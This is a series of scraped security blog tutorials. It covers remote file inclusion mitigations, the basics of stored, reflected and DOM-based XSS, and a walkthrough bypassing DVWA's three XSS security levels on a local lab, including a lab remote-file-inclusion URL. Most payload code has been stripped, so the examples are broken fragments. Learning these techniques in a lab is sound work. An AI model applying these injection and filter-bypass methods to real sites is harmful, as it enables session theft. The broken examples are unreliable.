http:// 192.168.1.8/dvwa/vulnerabilities/fi/?page=http://google.com

Read complete remote file inclusion attack tutorial fromhere

Mitigation

·         Strong Input Validation

·         A whitelist of acceptable inputs

·         Reject any inputs that does not strictly conform to specifications

·         For filenames, use stringent whitelists that limits the character set to be used

·         Exclude directory separators such as “/”

·         Use a whitelist of allowable file extensions

·         Environment hardening

·         Develop and run your code in the most recent versions of PHP available

·         Configure your PHP applications so that it does not use register_globals

·         Set allow_url_fopen to false, which limits the ability to include files from remote locations

·         Run your code using the lowest privileges

·         Use a vetted library or framework that does not allow this weakness.

Source:https://www.w3schools.com/ 

               https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion

               https://www.acunetix.com

Beginners Guide to Cross Site Scripting (XSS)

July 2, 2017, 4:30 am

≫ Next: Understanding DOM Based XSS in DVWA (Bypass All Security)

≪ Previous: Beginner Guide to File Inclusion Attack (LFI/RFI)

$

0

0

Java Script

JavaScript is the programming language of the web. It's one of the most popular and in demand skills in today's job market for good reason. JavaScript enables you to add powerful interactions to websites

A Scripting Language understood by the browser.

JS is embedded in HTML Pages

The Browser RUNS the js instead of displaying it

The

 

JavaScript code must be inserted between tags.

Event Handler

When JavaScript is used in HTML pages, JavaScript can "react" on these events.

When the page loads, it is called an event. When the user clicks a button, that click too is an event. Other examples include events like pressing any key, closing a window, resizing a window, etc.

Onload 

Basically java script uses onload function to load an object on any web page. For example I want to generate an alert for user those who visit my website; I will give the following JavaScript code.

So whenever the body tag loads, an alert will pop up with following text Welcome to Hacking Articles for the visitors. Here the loading of the body tag is an event or a happening and onload is an event handler which decides what will action will happen on that event.

Similarly, there are many JavaScript event handlers which define what event occurs for such type of action like scroll down of page, or when an image fails to load etc.

Onmouseover

Onmouseover, when the user moves his cursor over the text, the additional code will be executed. For example let understand following code:

surprise

Now when user moves his cursor over the surprise the displayed text on the page, an alert box will pop up with 50% discount.

onclick:	Use this to invoke JavaScript upon clicking (a link, or form boxes)
onload:	Use this to invoke JavaScript after the page or an image has finished loading
onmouseover	Use this to invoke JavaScript if the mouse passes by some link
onmouseout	Use this to invoke JavaScript if the mouse goes pass some link
onunload	Use this to invoke JavaScript right after someone leaves this page.

Cross Site Scripting (XSS)

XSS is listed as top third web application security risk in the OWASP to top 10 risk model 2017.

Cross-site scripting (XSS) is a flaw in a web application that allows an attacker to execute malicious JavaScript through code injection attack in another victim's browser.

In this attack user is not directly targeted through a payload, although attacker shoot the XSS vulnerability by inserting malicious script into a web page that appears to be a genuine part of the website to the users, whenever any user visit that website it will automatically send the malicious JavaScript code in his browser without his knowledge.

Let’s take an example that following code is XSS vulnerable, an attacker may possibly present a history that holds a malicious payload such as 

Print ""

Print "

Recent History

"

Print request.Recent History print "

"

Users visiting the web page will get the following HTML page without his knowledge.

Recent History

              Types of XSS:

There are actually three types of Cross-Site Scripting, commonly named as:

·         Persistent XSS

·         Non-persistent XSS

·         DOM-Based XSS

Persistent

A persistent XSS also known as stored XSS because through this vulnerability the injected malicious script get permanently stored inside the webserver and the application server give out it back to the user when he visits the respective website. Hence when the client will click on payload which appears as an official part of the website, the injected JavaScript will get execute by the browser.The most common example is comment option on blogs, which allow the users to POST their comment for administer or other user.

Persistent XSS is considered more dangerous because the malicious payload is stored inside web server as the more visitors will interact with the website will result into more XSS infected user. Attack does not require phishing technique to target its users.

Example:

An example of a web application vulnerable to stored XSS as shown in the screenshot.

This JavaScript gets stored in the database of the web application and gets executed on the victim's browser, which capture the cookie and send it to the attacker.

Read complete article from here

Non-Persistent

The non-persistent XSS is also known as reflected XSS is occurs when the web application respond immediately on user’s input without validating the inputs this lead an attacker to injects browser executable code inside the single HTML response. It’s named as “non-persistent” since the malicious script does not get stored inside the web server, therefore attacker will send the malicious link through phishing to trap the user.

The most common applying of this kind of vulnerability is in Search engines in website: the attacker writes some arbitrary HTML code in the search textbox and, if the website is vulnerable, the result page will return the result of these HTML entities.

Example:

An example of a web application vulnerable to reflected XSS as shown in the screenshot.

It is also known as type 1 because this attack is carried out through single request/response then gets executed on the victim's browser, and will prompt an alert “hellllooo” to his browser.

Read complete article from here

DOM-Based:

The Document Object Model (DOM) is an APIthat increases the skill of programmers or developers to produce and change HTML and XML documents as programming objects.

The JavaScript language is used in DOM, which is also used for other websites. Through JavaScript it allows programmer to make the dynamic changes in HTML document can be accessed, modify, deleted, or added using the DOM.

When an HTML document is loaded into a web browser, it becomes a document object.

The document object is the root node of the HTML document and the "owner" of all other nodes

The HTML DOM model is constructed as a tree of Objects

With the object model, JavaScript gets all the power it needs to create dynamic HTML:

·         JavaScript can change all the HTML elements in the page

·         JavaScript can change all the HTML attributes in the page

·         JavaScript can change all the CSS styles in the page

·         JavaScript can remove existing HTML elements and attributes

·         JavaScript can add new HTML elements and attributes

·         JavaScript can react to all existing HTML events in the page

·         JavaScript can create new HTML events in the page

The DOM-Based Cross-Site Scripting is vulnerability which appears in document object model instead of html page. An attacker is not allowed to execute malicious script on the user’s website although on his local machine in URL, it is quite different from reflected and XSS because in this attack developer cannot able to find malicious script in HTML source code as well as in HTML response, it can be observed at execution time.

The DOM-Based XSS exploits these problems on user’s local machines in this way:

– The attacker creates a well built malicious website
– The ingenious user opens that sites
– The user has a vulnerable page on his machine
– The attacker’s website sends commands to the vulnerable HTML page
– The vulnerable local page execute that commands with the user’s privileges on that machine.
– The attacker easily gain control on the victim computer.

Example:

The following screenshot is an example of a web application server that is affect with DOM based XSS attack. The web application let you to choose the following language and will execute through URL.

http://localhost:81/dvwa/vulnerabilities/xss_d/?default=English

Attacker will add malicious script inside URL

http://localhost:81/dvwa/vulnerabilities/xss_d/?default=English#

The major difference between DOM XSS and Reflected or Stored XSS flaw is that it cannot be stopped by server-side filters because anything written after the "#" (hash) will never forward to the server.

Understanding DOM Based XSS in DVWA (Bypass All Security)

July 2, 2017, 9:48 pm

≫ Next: Beginner Guide to OS Command Injection

≪ Previous: Beginners Guide to Cross Site Scripting (XSS)

$

0

0

This article is written to bring awareness among all security researchers and developers so that they may be able to learn the level of damage cause by XSS attack if the web server is suffering from cross site scripting vulnerability.

DOM Based XSS (TYPE 0)

The DOM-Based Cross-Site Scripting is vulnerability which appears in document object model instead of html page. An attacker is not allowed to execute malicious script on the user’s website although on his local machine in URL, it is quite different from reflected and XSS because in this attack developer cannot able to find malicious script in HTML source code as well as in HTML response, it can be observed at execution time.

This can make it stealthier than other attacks and WAFs or other protections which are reading the page body does not see any malicious content.

Let’s start!!!

Target: DVWA

Low security

 For this tutorial I had targeted DVWA and explore localhost IP in browser; now login with admin: password into web application and Set security level low.

Select the DOM cross site scriptingvulnerability from given list of vulnerability. The web application allows the user to select any language form drop down list.

Now let’s understand current scenario when security is low; in this part the developer has not add any filter while framing the code for web site that could check for any malicious activity. Hence if an attacker opens the website in low security and tries for XSS attack possible he gets successful in his deed.  

http://localhost:81/dvwa/vulnerabilities/xss_d/?default=English

The JavaScript code obtains value from the URL parameter “default” and writes the value in the webpage and as the result the web page show English as output. Now attacker will inject following code into URL and send this link to the client through social engineering.

http://localhost:81/dvwa/vulnerabilities/xss_d/?default=English>

Great!! Now you can check the output in the given screenshot.

Medium Security

Let change the security level from low to medium level

In medium security the developer has tried to add a simple pattern matching to remove any references to "

http://localhost:81/dvwa/vulnerabilities/xss_d/?default=English

 

Similarly this time attacker will try different technique to exploit the vulnerability, he can insert malicious script using JavaScript onload function and send link to victim. In this level attacker first need to break out select block to inject body onload or image tag.

 

High Security

Now increase the security level from medium to high.

In high security the developer is now white listing only the allowed languages, you must find a way to run your code without it going to the server.

http://localhost:81/dvwa/vulnerabilities/xss_d/?default=English

 

The fragment section of a URL anything after the # (hash) symbol does not get sent to the server and so cannot be blocked. The bad JavaScript being used to make the page reads the content from it when creating the page.

 

Awesome!!! We have successfully bypassed all three security level of DVWA